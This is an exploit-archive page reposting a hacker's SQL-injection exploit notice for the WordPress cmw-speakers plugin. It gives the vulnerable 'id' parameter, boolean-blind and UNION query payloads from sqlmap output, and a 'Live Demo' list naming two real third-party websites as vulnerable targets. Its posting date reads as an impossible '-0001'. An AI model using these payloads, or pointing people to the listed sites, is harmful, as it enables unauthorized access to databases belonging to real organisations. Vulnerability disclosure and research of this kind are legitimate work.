Home / os / win10

Wordpress cmw-speakers Plugin SQL injection Vulnerability

Posted on 30 November -0001

<HTML><HEAD><TITLE>Wordpress cmw-speakers Plugin  SQL injection Vulnerability</TITLE><META http-equiv="Content-Type" content="text/html; charset=utf-8"></HEAD><BODY>|----------------------------|
|        [xBADGIRL21]        |
|    [N3W PUBLIC 3XPL0IT]    |
|           _,________       |
|     0day _T _==____() --   |
|         /##(_)-'           |
|        /##/                |
|        x21                 |
|----------------------------|
| Exploit Title : Wordpress cmw-speakers Plugin  SQL injection Vulnerability
| Exploit Author : xBADGIRL21
| Dork : N/A in PUBLISH VERSION
| version : ALL
| Tested on: [ WINDOWS]
| MyBlog : http://xbadgirl21.blogspot.com/
| Date: 13/01/2017
| video Proof : https://youtu.be/Bqnf4Eyniqc
| To buy or Danate my BTC: 1Bgqu8faM8SPrArjoWRofRaTbMdes16mRz
|--------------------
| [+] Poc :         |
|--------------------
| [id] Get Parameter Vulnerable To SQLi
| http://127.0.0.1/wp-content/plugins/cmw-speakers/speaker_details.php?id=[SQLi]
|--------------------
| [+] SQLmap PoC:   |
|--------------------
| ---
| Parameter: id (GET)
|    Type: boolean-based blind
|    Title: AND boolean-based blind - WHERE or HAVING clause
|    Payload: id=97 AND 8158=8158
|
|    Type: UNION query
|    Title: Generic UNION query (NULL) - 27 columns
|    Payload: id=-9178 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,N
| ULL,NULL,NULL,CONCAT(0x716a786b71,0x6d5342665a52696145434b4c694e546e61445972684f
| 415a415845655a7a6f647658667459454b77,0x7171627a71),NULL,NULL,NULL,NULL,NULL,NULL
|,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- Srfj
| ---
| [INFO] GET parameter 'id' is 'Generic UNION query (NULL) - 1 to 20 columns' injectable
| GET parameter 'id' is vulnerable. Do you want to keep testing the others (if any)? [y/N] N
|--------------------
| [!] Live Demo :   |
|--------------------
|1) http://cmw.net/radio/wp-content/plugins/cmw-speakers/speaker_details.php?id=9
|2) http://digitalmediasummit.ca/wp-content/plugins/cmw-speakers/speaker_details.php?id=375
|-----------------------------------------------
| Discovered by : xBADGIRL21                   |
| Greetz : All Mauritanien Hackers - NoWhere   |
+----------------------------------------------+</BODY></HTML>

 

TOP

Malware :

Exploits :